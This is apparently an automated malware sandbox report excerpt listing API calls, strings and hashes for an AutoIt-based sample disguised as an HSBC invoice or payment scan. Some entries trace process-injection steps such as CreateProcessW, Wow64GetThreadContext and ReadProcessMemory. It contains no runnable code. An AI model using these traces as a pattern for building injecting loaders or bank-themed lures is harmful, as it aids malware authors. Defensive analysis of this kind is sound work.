                    • Instruction ID: 8963142d9c422428bcbcf9185c0e0a78ac4cb55455a26295fe29ba63f7932f50
                    • Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                    • Instruction Fuzzy Hash: 94A10774E00219EBDB18CFA4D894BEEB7B5BF48304F20915DE605BB280D7799A81DF94

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00E83074
                    • RegisterClassExW.USER32(00000030), ref: 00E8309E
                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00E830AF
                    • LoadIconW.USER32(000000A9), ref: 00E830F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Register$BrushClassClipboardColorFormatIconLoad
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 975902462-1005189915
                    • Opcode ID: 338280fb25340807112e4c572e45c8cb66c7c519c295961fb70215f328df3954
                    • Instruction ID: a3c0a0d6f3bd64b99f9d6f8dac0b017ad9c953b3277f0364fbc7b3aba1d9cb7a
                    • Opcode Fuzzy Hash: 338280fb25340807112e4c572e45c8cb66c7c519c295961fb70215f328df3954
                    • Instruction Fuzzy Hash: CF3116B5940309AFDB50DFA4E885ACDBBF0FB1A710F10452AE990E62A0D3B54549EF92

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00E83074
                    • RegisterClassExW.USER32(00000030), ref: 00E8309E
                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00E830AF
                    • LoadIconW.USER32(000000A9), ref: 00E830F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Register$BrushClassClipboardColorFormatIconLoad
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 975902462-1005189915
                    • Opcode ID: dbfad59e15f111ecb3c612fe606ef564d2263adc54b23eca85f6d77e84aebd85
                    • Instruction ID: 6f803984642109e81c9de70ea4a5a52c6618708956bf988e9f8c78942f75ac8b
                    • Opcode Fuzzy Hash: dbfad59e15f111ecb3c612fe606ef564d2263adc54b23eca85f6d77e84aebd85
                    • Instruction Fuzzy Hash: 4021C3B591031CAFDB10DFA4EC89B9DBBF4FB1A700F00412AF911E62A0D7B54548AF92

                    Control-flow Graph

                    Control-flow graph (rendered image; legend: Executed / Not Executed). Single block e839e7-e83a57 calling CreateWindowExW twice and ShowWindow twice.
                    APIs
                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E83A15
                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E83A36
                    • ShowWindow.USER32(00000000,?,?), ref: 00E83A4A
                    • ShowWindow.USER32(00000000,?,?), ref: 00E83A53
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$CreateShow
                    • String ID: AutoIt v3$edit
                    • API String ID: 1584632944-3779509399
                    • Opcode ID: 29240cb4af450fbb636e4623d36db50f9de3c06bacd61cf9aaa603b6335a4d32
                    • Instruction ID: ad4f76bd6e249affd0fd05ad889a1d138bd9529de57701fca4e8e94dcda0265b
                    • Opcode Fuzzy Hash: 29240cb4af450fbb636e4623d36db50f9de3c06bacd61cf9aaa603b6335a4d32
                    • Instruction Fuzzy Hash: 54F03A746402987EEF3117276C08E273E7DE7D7F50B00002ABD00E21B0C2E50800FAB2

                    Control-flow Graph

                    Control-flow graph (rendered image; legend: Executed / Not Executed). Function blocks e223b0-e225f6; API calls on the graph: CreateFileW, VirtualAlloc, ReadFile, ExitProcess.
                    APIs
                      • Part of subcall function 00E222A0: Sleep.KERNELBASE(000001F4), ref: 00E222B1
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E2252A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272013729.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e20000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CreateFileSleep
                    • String ID: CWFNJ1JTDQN2UH5R80LYGX3Z2VY
                    • API String ID: 2694422964-2617192783
                    • Opcode ID: f301891bf8a50a731e754401a6a46cc96efabae78c7b5ef29d198cfde665c830
                    • Instruction ID: 8c637ad9dc5929a1b080e9d318141d511705be80b2f28cec88a6a191ab45b584
                    • Opcode Fuzzy Hash: f301891bf8a50a731e754401a6a46cc96efabae78c7b5ef29d198cfde665c830
                    • Instruction Fuzzy Hash: 28718430D04298EBEF11DBE4D8557EEBB75AF19304F048099E248BB2C0D7BA1B45CB66

                    Control-flow Graph

                    Control-flow graph (rendered image; legend: Executed / Not Executed). Function blocks e8410d-e84204 and ebd5dd-ebd633; API calls on the graph: LoadStringW, Shell_NotifyIconW.
                    APIs
                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00EBD5EC
                      • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                    • _memset.LIBCMT ref: 00E8418D
                    • _wcscpy.LIBCMT ref: 00E841E1
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E841F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                    • String ID: Line:
                    • API String ID: 3942752672-1585850449
                    • Opcode ID: a6137f28daacfc195210c24814aff04f4b45ff25f189c489f14e90313173fbca
                    • Instruction ID: 3748b49ee414bea48c698117d53bd8c19bf4450ed2b0565601f7c87d0666fa00
                    • Opcode Fuzzy Hash: a6137f28daacfc195210c24814aff04f4b45ff25f189c489f14e90313173fbca
                    • Instruction Fuzzy Hash: 2D31A171009309AAD721FB60DC45BDB77E8AF56304F10551EB58DB20E1EBB4A648D793
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                    • String ID:
                    • API String ID: 1559183368-0
                    • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                    • Instruction ID: 779e997d07ec942afde5a806c167ae08009a970c927b620c247d79b46f768b42
                    • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                    • Instruction Fuzzy Hash: 8051CA32A00B05DFDB248F79C8806AE77A5AF4A324F64972AF835BE1D0D770BD508B40
                    APIs
                      • Part of subcall function 00E84F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00F462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E84F6F
                    • _free.LIBCMT ref: 00EBE68C
                    • _free.LIBCMT ref: 00EBE6D3
                      • Part of subcall function 00E86BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E86D0D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _free$CurrentDirectoryLibraryLoad
                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                    • API String ID: 2861923089-1757145024
                    • Opcode ID: ca8adf7c3144fe921f7d25a1c03e568f50c5d57ca738e9829fbba89c37a83d63
                    • Instruction ID: 2f3f3c4223d6ae68a80d64b0c74c0d91168b6eb73ceafdb19f8b9f7ef319051a
                    • Opcode Fuzzy Hash: ca8adf7c3144fe921f7d25a1c03e568f50c5d57ca738e9829fbba89c37a83d63
                    • Instruction Fuzzy Hash: 5A914E71910219AFCF14EFA4C8919EEB7F4FF19314F14546AF81ABB2A1EB30A905DB50
                    APIs
                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00E835A1,SwapMouseButtons,00000004,?), ref: 00E835D4
                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00E835A1,SwapMouseButtons,00000004,?,?,?,?,00E82754), ref: 00E835F5
                    • RegCloseKey.KERNELBASE(00000000,?,?,00E835A1,SwapMouseButtons,00000004,?,?,?,?,00E82754), ref: 00E83617
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: Control Panel\Mouse
                    • API String ID: 3677997916-824357125
                    • Opcode ID: b10d1f962472697784d22d0166ea4d6c0d41e3761006827f4f20d3b04483c35d
                    • Instruction ID: 36458b21a69738bc6d173e95aab2c0a6f9f1a949dfdffba8d09865c5d7e5b694
                    • Opcode Fuzzy Hash: b10d1f962472697784d22d0166ea4d6c0d41e3761006827f4f20d3b04483c35d
                    • Instruction Fuzzy Hash: D5115A71910208BFDB20DF68DC40DEEBBB8EF04B44F0094A9F809E7210E2719F44A760
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00E21A5B
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E21AF1
                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E21B13
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272013729.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e20000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    • Opcode ID: 3790e136272a110f5ab4d8617909c812004bdd41f4683ed991f3cafb80161bff
                    • Instruction ID: fecacafaa7a29994dce2eec74b1ee5a8ee2a28e7ebc6f6feffb4195e7fc9b3ad
                    • Opcode Fuzzy Hash: 3790e136272a110f5ab4d8617909c812004bdd41f4683ed991f3cafb80161bff
                    • Instruction Fuzzy Hash: BC620A30A14258DBEB24CFA4D841BDEB376EF68304F1091A9D10DFB294E7799E81CB59
                    APIs
                      • Part of subcall function 00E85045: _fseek.LIBCMT ref: 00E8505D
                      • Part of subcall function 00EE99BE: _wcscmp.LIBCMT ref: 00EE9AAE
                      • Part of subcall function 00EE99BE: _wcscmp.LIBCMT ref: 00EE9AC1
                    • _free.LIBCMT ref: 00EE992C
                    • _free.LIBCMT ref: 00EE9933
                    • _free.LIBCMT ref: 00EE999E
                      • Part of subcall function 00EA2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA9C64), ref: 00EA2FA9
                      • Part of subcall function 00EA2F95: GetLastError.KERNEL32(00000000,?,00EA9C64), ref: 00EA2FBB
                    • _free.LIBCMT ref: 00EE99A6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                    • String ID:
                    • API String ID: 1552873950-0
                    • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                    • Instruction ID: ea4051d2605339d775ce102b48eead7a99b5fbd125e60e1b6c71cd2a78341e07
                    • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                    • Instruction Fuzzy Hash: 585150B1904258AFDF249F65DC81A9EBBB9EF48310F1014AEB60DB7242DB715E80CF58
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                    • String ID:
                    • API String ID: 2782032738-0
                    • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                    • Instruction ID: f2d98f6159a405269c80e0fb4edce14eeb9c7456fdb063a4ebb0d4ba02a8c862
                    • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                    • Instruction Fuzzy Hash: F341E9B06007069BDB188E69C8805AF77A5EFCE354B24917DE855EF6C0E7B0BD508744
                    APIs
                    • _memset.LIBCMT ref: 00EBEE62
                    • 75B5D0D0.COMDLG32(?), ref: 00EBEEAC
                      • Part of subcall function 00E848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E848A1,?,?,00E837C0,?), ref: 00E848CE
                      • Part of subcall function 00EA09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EA09F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: NamePath$FullLong_memset
                    • String ID: X
                    • API String ID: 3051022977-3081909835
                    • Opcode ID: fc6ad2b956bf238f4744b6677b0195a98bd300099bb6508aab51d355f5dc6fe6
                    • Instruction ID: 29672edc0c7834bd7f610668b78c3bbb3de4cd2337f051c974feff96e6738159
                    • Opcode Fuzzy Hash: fc6ad2b956bf238f4744b6677b0195a98bd300099bb6508aab51d355f5dc6fe6
                    • Instruction Fuzzy Hash: C721A470A042589BCB11EFA4C845BEE7BF89F49314F10405AE40CFB282DBF499499F91
                    Similarity
                    • API ID: __fread_nolock_memmove
                    • String ID: EA06
                    • API String ID: 1988441806-3962188686
                    • Opcode ID: 39c97bfc987e2714a143be08bc236c9913ca5ffbae4cb049348d50e5040ae9e4
                    • Instruction ID: 1ec6412506eda772fb85e3a7d6a5c3561ae960bdfd798981584c10baf3da6cdc
                    • Opcode Fuzzy Hash: 39c97bfc987e2714a143be08bc236c9913ca5ffbae4cb049348d50e5040ae9e4
                    • Instruction Fuzzy Hash: CA01F9728042586EDB28C7A9C856EEE7BF89B05301F00419AF552E6181E5B9EA048B60
                    APIs
                      • Part of subcall function 00EA594C: __FF_MSGBANNER.LIBCMT ref: 00EA5963
                      • Part of subcall function 00EA594C: __NMSG_WRITE.LIBCMT ref: 00EA596A
                      • Part of subcall function 00EA594C: RtlAllocateHeap.NTDLL(011A0000,00000000,00000001), ref: 00EA598F
                    • std::exception::exception.LIBCMT ref: 00EA102C
                    • __CxxThrowException@8.LIBCMT ref: 00EA1041
                      • Part of subcall function 00EA87DB: RaiseException.KERNEL32(?,?,00000000,00F3BAF8,?,00000001,?,?,?,00EA1046,00000000,00F3BAF8,00E89FEC,00000001), ref: 00EA8830
                    Similarity
                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                    • String ID: bad allocation
                    • API String ID: 3902256705-2104205924
                    • Opcode ID: f1481b3d5945f12ac87aa7071c041834d5af1130b43e6e8efc0e0738c74f75d4
                    • Instruction ID: 4c13c16042ac4d7acf569ff28d1c1d6cb1565db484a41586216332eee09267dd
                    • Opcode Fuzzy Hash: f1481b3d5945f12ac87aa7071c041834d5af1130b43e6e8efc0e0738c74f75d4
                    • Instruction Fuzzy Hash: F3F0283550020DA6CB20BA98ED219DF77EC9F0A390F1010A6FC04FE192DFB0AAD0A2D0
                    APIs
                    • GetTempPathW.KERNEL32(00000104,?), ref: 00EE9B82
                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00EE9B99
                    Similarity
                    • API ID: Temp$FileNamePath
                    • String ID: aut
                    • API String ID: 3285503233-3010740371
                    • Opcode ID: 4a98c16752fc3024537d4b19b4e85ed7adb8a86aad00d27eeb5a3b7e3318a52a
                    • Instruction ID: 69fee3ace9b388d2077fb09752429a4d6a9f993f6a6101262cc6f2fd1bf658f1
                    • Opcode Fuzzy Hash: 4a98c16752fc3024537d4b19b4e85ed7adb8a86aad00d27eeb5a3b7e3318a52a
                    • Instruction Fuzzy Hash: 9BD05E7954030DABDB20DBA0EC0EF9A772CE704700F0042A1BE94910A1DEB0A5989B92
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 146384811a4323b6fa8ab5f874a23f117d32f88e6b10542de70225693e23a7be
                    • Instruction ID: 3165d98082dca206c2792fdf4ad7bd937148202963aab616366f52e6d3c61a41
                    • Opcode Fuzzy Hash: 146384811a4323b6fa8ab5f874a23f117d32f88e6b10542de70225693e23a7be
                    • Instruction Fuzzy Hash: EFF16E719083059FC714DF28C880A6ABBE5FF88314F14996DF999AB351D731E945CF82
                    APIs
                      • Part of subcall function 00EA03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EA03D3
                      • Part of subcall function 00EA03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00EA03DB
                      • Part of subcall function 00EA03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EA03E6
                      • Part of subcall function 00EA03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EA03F1
                      • Part of subcall function 00EA03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00EA03F9
                      • Part of subcall function 00EA03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00EA0401
                      • Part of subcall function 00E96259: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00E962B4
                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E8FB2D
                    • OleInitialize.OLE32(00000000), ref: 00E8FBAA
                    • CloseHandle.KERNEL32(00000000), ref: 00EC49F2
                    Similarity
                    • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                    • String ID:
                    • API String ID: 3094916012-0
                    • Opcode ID: cd5821d1cadf0c5e21f774c84d14e4693dbb398b338149a92afb343c7db21794
                    • Instruction ID: 8f2a141738b0ce81484ab6ca98ffe4295d640d5477f8ebe5d884061ded5428a7
                    • Opcode Fuzzy Hash: cd5821d1cadf0c5e21f774c84d14e4693dbb398b338149a92afb343c7db21794
                    • Instruction Fuzzy Hash: 8581A9B89013988ECB84EF39E9446657BE4FBAB718314912ADC19D7372EB314448EF13
                    APIs
                    • _memset.LIBCMT ref: 00E84401
                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E844A6
                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E844C3
                    Similarity
                    • API ID: IconNotifyShell_$_memset
                    • String ID:
                    • API String ID: 1505330794-0
                    • Opcode ID: 5102a083ead5cb6146017abfc8e58a4517eeb07ccf4aec0512b6e725c34854a5
                    • Instruction ID: 606e45e8797e771796718368d3b99ad1485dfa36d3387c0bfddf570d25888606
                    • Opcode Fuzzy Hash: 5102a083ead5cb6146017abfc8e58a4517eeb07ccf4aec0512b6e725c34854a5
                    • Instruction Fuzzy Hash: 033182B45057059FD720EF24D884697BBE4FB59308F00092EE99ED3290D7B16A48CB52
                    APIs
                    • __FF_MSGBANNER.LIBCMT ref: 00EA5963
                      • Part of subcall function 00EAA3AB: __NMSG_WRITE.LIBCMT ref: 00EAA3D2
                      • Part of subcall function 00EAA3AB: __NMSG_WRITE.LIBCMT ref: 00EAA3DC
                    • __NMSG_WRITE.LIBCMT ref: 00EA596A
                      • Part of subcall function 00EAA408: GetModuleFileNameW.KERNEL32(00000000,00F443BA,00000104,00000000,00000001,00000000), ref: 00EAA49A
                      • Part of subcall function 00EAA408: ___crtMessageBoxW.LIBCMT ref: 00EAA548
                      • Part of subcall function 00EA32DF: ___crtCorExitProcess.LIBCMT ref: 00EA32E5
                      • Part of subcall function 00EA32DF: ExitProcess.KERNEL32 ref: 00EA32EE
                      • Part of subcall function 00EA8D68: __getptd_noexit.LIBCMT ref: 00EA8D68
                    • RtlAllocateHeap.NTDLL(011A0000,00000000,00000001), ref: 00EA598F
                    Similarity
                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                    • String ID:
                    • API String ID: 1372826849-0
                    • Opcode ID: 7f8b470475e39ede2a03d9f0567936cdc29412baa9bf1f97961626c3a6898981
                    • Instruction ID: 23030575f3f9d229ac55635b7a5e6d0a623a4cf3d815e4f22111f95fa8e2a4d0
                    • Opcode Fuzzy Hash: 7f8b470475e39ede2a03d9f0567936cdc29412baa9bf1f97961626c3a6898981
                    • Instruction Fuzzy Hash: 8B019237200B15DEE6212B74E842B6F72D89F9B774F11203AF921BE191DB70BD019661
                    APIs
                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00EE97D2,?,?,?,?,?,00000004), ref: 00EE9B45
                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00EE97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00EE9B5B
